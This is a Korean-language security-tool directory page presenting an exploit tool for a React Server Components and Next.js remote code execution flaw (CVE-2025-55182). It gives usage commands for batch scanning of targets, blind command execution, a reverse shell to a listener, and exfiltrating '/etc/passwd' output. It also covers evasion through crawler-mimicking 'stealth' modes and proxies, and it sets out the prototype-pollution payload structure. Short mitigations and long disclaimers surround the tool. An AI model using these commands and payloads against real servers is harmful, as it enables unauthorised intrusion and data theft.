Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 React 서버 컴포넌트 원격 코드 실행 익스플로잇 도구 | Kitploit
도구/GitHubGitHub/spritualkb/cve-2025-55182-exp
Vulnerability ScannersExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRed TeamingRemote Access ToolPayload Development
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 React 서버 컴포넌트 원격 코드 실행 익스플로잇 도구

46128개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2025-55182-exp

CVE Type Python License

🔥 개요

CVE-2025-55182는 App Router와 Server Actions를 사용하는 Next.js 애플리케이션에 영향을 주는 React Server Components(RSC)의 치명적인 원격 코드 실행(RCE) 취약점입니다.

이 취약점은 Flight 프로토콜 역직렬화 과정에 존재하며, 공격자가 프로토타입 오염(prototype pollution)을 통해 임의 코드 실행을 달성할 수 있게 합니다.

⚠️ 면책 조항

승인된 보안 테스트 전용

이 도구는 교육 및 승인된 침투 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 이 도구의 불법 또는 무단 사용에 대한 책임은 전적으로 사용자에게 있습니다. 저자는 어떠한 책임도 지지 않습니다.

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용할 수 있습니다. 위반 또는 불법 행위로 인한 모든 결과는 전적으로 사용자가 부담하며, 작성자와는 무관합니다.

이 도구를 사용하기 전에 전체 DISCLAIMER.md를 읽어 주세요.

이 도구를 사용함으로써 다음 사항에 동의하게 됩니다:

  • 모든 테스트에 대해 적절한 승인을 받았습니다
  • 모든 관련 법률과 규정을 준수합니다
  • 본인의 행동에 대한 전적인 책임을 수락합니다
  • 저자는 어떠한 오용에 대해서도 책임을 지지 않습니다

📋 영향을 받는 버전

구성 요소영향을 받는 버전
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ 설치

root@kitploit:~
# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Install dependencies
pip install requests
pip install requests[socks]  # For SOCKS5 proxy support

📖 사용법

단일 대상 확인

root@kitploit:~
python3 exploit.py http://target:3000 --check

파일 기반 일괄 스캔

root@kitploit:~
# Basic batch scan
python3 exploit.py -f targets.txt --check

# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt

명령 실행 (Blind RCE)

root@kitploit:~
python3 exploit.py http://target:3000 -c "id"

리버스 셸

root@kitploit:~
# Start listener first
nc -lvnp 4444

# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

명령 출력 탈취

root@kitploit:~
# Start listener
nc -lvnp 4444

# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

프록시 사용

root@kitploit:~
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 스텔스 모드

모드설명
browser실제 브라우저 요청을 모방 (기본값)
crawler검색 엔진 크롤러를 모방 (Googlebot, Baiduspider 등)
security보안 스캐너 User-Agent 사용

🔧 옵션

🔬 기술적 세부 사항

취약점 메커니즘

이 익스플로잇은 Flight 프로토콜 역직렬화 과정의 프로토타입 오염을 활용합니다:

  1. 프로토타입 오염: "$1:__proto__:then"을 통해 Object.prototype.then을 오염시킵니다
  2. 함수 생성자 접근: "$1:constructor:constructor"를 통해 _formData.get을 Function 생성자로 설정합니다
  3. 코드 주입: Function()에 전달되는 _prefix를 통해 악성 코드를 주입합니다

페이로드 구조

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 파일 구조

root@kitploit:~
CVE-2025-55182-exp/
├── exploit.py      # Main exploit script
├── targets.txt     # Target URLs list (one per line)
└── README.md       # This file

📝 targets.txt 형식

root@kitploit:~
# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ 완화 조치

  1. react-server-dom-webpack 및 Next.js의 최신 패치 버전으로 업데이트하십시오
  2. Server Actions에 대한 입력 검증을 구현하십시오
  3. 악성 Flight 프로토콜 페이로드를 탐지하는 WAF(웹 애플리케이션 방화벽) 규칙을 사용하십시오
  4. 프로토타입 관련 메시지가 포함된 비정상적인 서버 측 오류(HTTP 500)를 모니터링하십시오

📜 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.


⚠️ 법적 면책 조항

영어

사용 약관

이 소프트웨어를 다운로드, 복사, 설치 또는 사용함으로써 귀하는 본 면책 조항의 조건에 구속되는 것에 동의합니다.

의도된 용도

이 도구는 오직 다음 용도로만 설계되었습니다:

  • 승인된 침투 테스트
  • 보안 연구 및 교육
  • 적절한 승인을 받은 취약점 평가
  • CTF(캡처 더 플래그) 대회
  • 개인 실습 환경

금지된 사용

이 도구를 다음 용도로 사용해서는 안 됩니다:

  • 컴퓨터 시스템에 대한 무단 접근
  • 모든 불법 활동
  • 명시적인 서면 허가 없이 시스템 공격
  • 시스템 또는 데이터에 손상 초래
  • 지역, 주, 국가 또는 국제 법률을 위반하는 모든 활동

보증 없음

본 소프트웨어는 명시적이든 묵시적이든 어떠한 종류의 보증 없이 "있는 그대로"(AS IS) 제공됩니다. 저자는 다음을 포함하되 이에 국한되지 않는 모든 보증을 부인합니다:

  • 상품성
  • 특정 목적에의 적합성
  • 비침해성

책임 제한

어떠한 경우에도 저자는 다음에 대해 책임을 지지 않습니다:

  • 직접, 간접, 부수적, 특별, 징벌적 또는 결과적 손해
  • 데이터, 이익 또는 사업 기회의 손실
  • 이 도구의 오용으로 인해 발생하는 법적 결과

사용자 책임

사용자는 다음에 대해 전적인 책임을 집니다:

  • 시스템을 테스트하기 전에 적절한 승인 획득
  • 모든 관련 법률과 규정 준수
  • 이 도구 사용으로 인한 모든 결과
  • 관할권 내에서 본인 행동의 적법성 보장

인정 사항

이 도구를 사용함으로써 다음 사항을 인정합니다:

  1. 본 면책 조항을 읽고 이해했습니다
  2. 이 도구를 법적이고 승인된 목적으로만 사용할 것입니다
  3. 이 도구 사용과 관련된 모든 위험을 수락합니다
  4. 저자는 어떠한 오용에 대해서도 책임을 지지 않습니다

중국어

사용 약관

본 소프트웨어를 다운로드, 복사, 설치 또는 사용하면 본 면책 조항의 조건에 구속되는 것에 동의하는 것으로 간주됩니다.

의도된 용도

이 도구는 다음 용도로만 사용됩니다:

  • 승인된 침투 테스트
  • 보안 연구 및 교육
  • 적절한 승인을 받은 취약점 평가
  • CTF(깃발 뺏기) 대회
  • 개인 실습 환경

금지된 용도

이 도구를 다음 용도로 사용할 수 없습니다:

  • 승인되지 않은 컴퓨터 시스템 접근
  • 모든 불법 활동
  • 명시적인 서면 허가 없이 시스템 공격
  • 시스템 또는 데이터에 손상 초래
  • 지역, 주, 국가 또는 국제 법률을 위반하는 모든 활동

보증 없음

본 소프트웨어는 "있는 그대로" 제공되며, 명시적 또는 묵시적 보증이 제공되지 않습니다. 저자는 다음을 포함하되 이에 국한되지 않는 모든 보증을 부인합니다:

  • 상품성
  • 특정 목적에의 적합성
  • 비침해성

책임 제한

어떠한 경우에도 저자는 다음의 경우에 대해 책임을 지지 않습니다:

  • 직접, 간접, 부수적, 특별, 징벌적 또는 결과적 손해
  • 데이터, 이익 또는 사업 기회의 손실
  • 이 도구의 오용으로 인해 발생하는 법적 결과

사용자 책임

사용자는 다음 사항에 대해 모든 책임을 집니다:

  • 시스템을 테스트하기 전에 적절한 승인 획득
  • 모든 관련 법률과 규정 준수
  • 이 도구 사용으로 인한 모든 결과
  • 관할권 내에서 본인 행동의 적법성 보장

확인 성명

이 도구를 사용하면 다음 사항을 확인하는 것으로 간주됩니다:

  1. 본 면책 조항을 읽고 이해했습니다
  2. 이 도구를 합법적이고 승인된 목적으로만 사용할 것입니다
  3. 이 도구 사용과 관련된 모든 위험을 수락합니다
  4. 저자는 어떠한 오용 행위에 대해서도 책임을 지지 않습니다

법적 참고 자료

관련 법률

  • 중국: 《중화인민공화국 사이버보안법》, 《중화인민공화국 형법》 제285조, 제286조
  • 미국: Computer Fraud and Abuse Act(CFAA), 18 U.S.C. § 1030
  • EU: 정보 시스템 공격에 관한 지침 2013/40/EU
  • 영국: Computer Misuse Act 1990

승인 테스트 요구 사항

보안 테스트를 수행하기 전에 반드시:

  1. 시스템 소유자의 서면 승인을 받아야 합니다
  2. 테스트 범위와 경계를 명확히 정의해야 합니다
  3. 모든 관련 법률과 규정을 준수해야 합니다
  4. 모든 테스트 활동을 기록해야 합니다

보안 테스트를 수행하기 전에 반드시:

  1. 시스템 소유자의 서면 승인을 받아야 합니다
  2. 테스트의 범위와 경계를 명확히 정의해야 합니다
  3. 모든 관련 법률과 규정을 준수해야 합니다
  4. 모든 테스트 활동을 문서화해야 합니다

⚠️ 승인되지 않은 컴퓨터 접근은 불법 행위입니다 ⚠️
⚠️ 승인되지 않은 컴퓨터 접근은 범죄 행위입니다 ⚠️

도구 다운로드
옵션설명
target대상 URL (예: http://localhost:3000)
-f, --file대상 URL이 포함된 파일 (줄당 하나)
-o, --output취약한 대상을 저장할 출력 파일
-c, --command실행할 명령 (blind)
--check취약점 여부 확인
--proxySOCKS5 프록시 (예: socks5://127.0.0.1:1080)
--stealth스텔스 모드: browser, crawler, security
--delay요청 간 지연 시간 (초)
--variants철저한 확인을 위해 여러 페이로드 변형 사용
--revshell IP PORTIP:PORT로 리버스 셸 연결
--exfil CMD IP PORTCMD를 실행하고 출력을 IP:PORT로 POST 전송
-t, --timeout요청 제한 시간(초) (기본값: 15)